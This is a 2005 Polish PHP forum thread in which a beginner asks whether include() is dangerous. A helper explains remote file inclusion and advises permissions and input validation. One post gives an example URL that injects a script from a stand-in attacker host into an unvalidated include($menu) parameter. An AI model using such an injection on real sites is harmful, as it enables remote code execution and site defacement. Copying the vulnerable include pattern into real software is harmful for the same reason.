include() - Forum PHP.pl

include(), Funckja a bezpieczeństwo

gladiror Zobacz profil	20.07.2005, 11:38:53 Post #1
Grupa: Zarejestrowani Postów: 398 Pomógł: 0 Dołączył: 13.07.2005 Skąd: Lublin Ostrzeżenie: (0%)	Witam! Mam pytanie dotyczące funkcji include. Załuszmy, że mam plik index.php. W nim jest następujący skrypt: [PHP] pobierz, plaintext <? include(\"menu.html\"); ?> [PHP] pobierz, plaintext Plik menu.html zawiera kod html. Czy w tej sytuacji istnieje jakaś możliwość włamania się/ zmieny zawartości pliku lub coś w tym stylu? Piszę ten temat, bo jak próbowałem dowiedzieć się z poprzednich postów to nikt nie chciał już później mi dokładnie odpowiedzieć w związku z tym pytaniem... Ten post edytował gladiror 20.07.2005, 11:46:01 -------------------- "Państwo to ja" Ludwik XIV "Wróg zaatakuje to co kochasz" Ojciec Chrzestny "Wszystko powinno być proste jak to tylko możliwe, ale nie prostsze..." A. Einstein "Wyobraźnia jest ważniejsza niż wiedza" Albert Einstein "Nieprawda powtarzana wielokrotnie staje się prawdą"

Odpowiedzi (1 - 7)

revyag Zobacz profil	20.07.2005, 11:44:54 Post #2
Grupa: Przyjaciele php.pl Postów: 2 258 Pomógł: 16 Dołączył: 21.09.2004 Skąd: Kielce Ostrzeżenie: (0%)	Zmienić zawartość pliku mógłby tylko ktoś kto ma do niego fizyczny dostęp, np. shella na serwerze. To czy poprawnie będzie wszystko wyświetlone zależy od tego jak masz zorganizowane includowanie np. czy przekazujesz urlem jakieś parametry dotyczące pliku. -------------------- ------------- ------

gladiror Zobacz profil	20.07.2005, 11:47:31 Post #3
Grupa: Zarejestrowani Postów: 398 Pomógł: 0 Dołączył: 13.07.2005 Skąd: Lublin Ostrzeżenie: (0%)	A jeżeli istnieje podobna sytuacja tylko, że: [PHP] pobierz, plaintext <? include($menu); ?> [PHP] pobierz, plaintext Tutaj istnieje jakieś zagrożenie? -------------------- "Państwo to ja" Ludwik XIV "Wróg zaatakuje to co kochasz" Ojciec Chrzestny "Wszystko powinno być proste jak to tylko możliwe, ale nie prostsze..." A. Einstein "Wyobraźnia jest ważniejsza niż wiedza" Albert Einstein "Nieprawda powtarzana wielokrotnie staje się prawdą"

revyag Zobacz profil	20.07.2005, 11:52:23 Post #4
Grupa: Przyjaciele php.pl Postów: 2 258 Pomógł: 16 Dołączył: 21.09.2004 Skąd: Kielce Ostrzeżenie: (0%)	No to zobacz: Kod http://www.stwoja_strona.pl/index.php?menu=http://haker/skrypt_ktocy_cos_psuje.php -------------------- ------------- ------

gladiror Zobacz profil	20.07.2005, 11:58:38 Post #5
Grupa: Zarejestrowani Postów: 398 Pomógł: 0 Dołączył: 13.07.2005 Skąd: Lublin Ostrzeżenie: (0%)	ALe nawet jak bedzie skrypt na innym serwerze to np. istnieje mozliwość, że w tym skrypcie napisze funkcje która zmieni zawartośc pliku gdy wszystkie pliki są tylko do odczytu? Do tego chyba służy funkcja chmod()... O to w tym wszystkim chodzi?? A co sie stanie gdy globalne zmienne bedą na off? Też istnieje takie zagrożenie? -------------------- "Państwo to ja" Ludwik XIV "Wróg zaatakuje to co kochasz" Ojciec Chrzestny "Wszystko powinno być proste jak to tylko możliwe, ale nie prostsze..." A. Einstein "Wyobraźnia jest ważniejsza niż wiedza" Albert Einstein "Nieprawda powtarzana wielokrotnie staje się prawdą"

revyag Zobacz profil	20.07.2005, 12:02:29 Post #6
Grupa: Przyjaciele php.pl Postów: 2 258 Pomógł: 16 Dołączył: 21.09.2004 Skąd: Kielce Ostrzeżenie: (0%)	Sam sobie odpowiadasz Kwestia ustawienia odpowiednich praw dostępu do podstawa. Kolejna sprawa to walidacja zmiennych get i post. Inaczej świeżo upieczony "chacher " ze skryptem ściągniętym z sieci może Ci rozwalić stronę -------------------- ------------- ------

gladiror Zobacz profil	20.07.2005, 12:06:56 Post #7
Grupa: Zarejestrowani Postów: 398 Pomógł: 0 Dołączył: 13.07.2005 Skąd: Lublin Ostrzeżenie: (0%)	Ale żeby mógł mi rozwalić stronę to musi znać nazwę zmiennej... Jeżeli np. walne $jklasdjkladkasjdklahghghhghg to raczej trudno będzie mu trafić na taką zmienną... Chyba że istnieje jakaś możliwość podejrzenia zmiennych w skrypcie? Sorry, ze zapytuje, ale nie rozumiem "walidacja zmiennych get i post". To jest za fachowe słownictwo jak dla mnie... Mógłbyś to rozwinąć? -------------------- "Państwo to ja" Ludwik XIV "Wróg zaatakuje to co kochasz" Ojciec Chrzestny "Wszystko powinno być proste jak to tylko możliwe, ale nie prostsze..." A. Einstein "Wyobraźnia jest ważniejsza niż wiedza" Albert Einstein "Nieprawda powtarzana wielokrotnie staje się prawdą"

revyag Zobacz profil	20.07.2005, 12:14:01 Post #8
Grupa: Przyjaciele php.pl Postów: 2 258 Pomógł: 16 Dołączył: 21.09.2004 Skąd: Kielce Ostrzeżenie: (0%)	Z tą zmienną to chodziło mi to sytuację kiedy jej wartość jest przekazywana przez url. I właśnie tutaj trzeba sprawdzać czy przez url jest przekazywane to co byśmy chcieli, czy np. zamiast zmiennych typu int nie jest przekazywany string itd. To samo tyczy się danych pobieranych z formularza. -------------------- ------------- ------

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Linearny+ · Przełącz na: Drzewo

Aktualny czas: 14.08.2025 - 11:45

Hosting zapewnia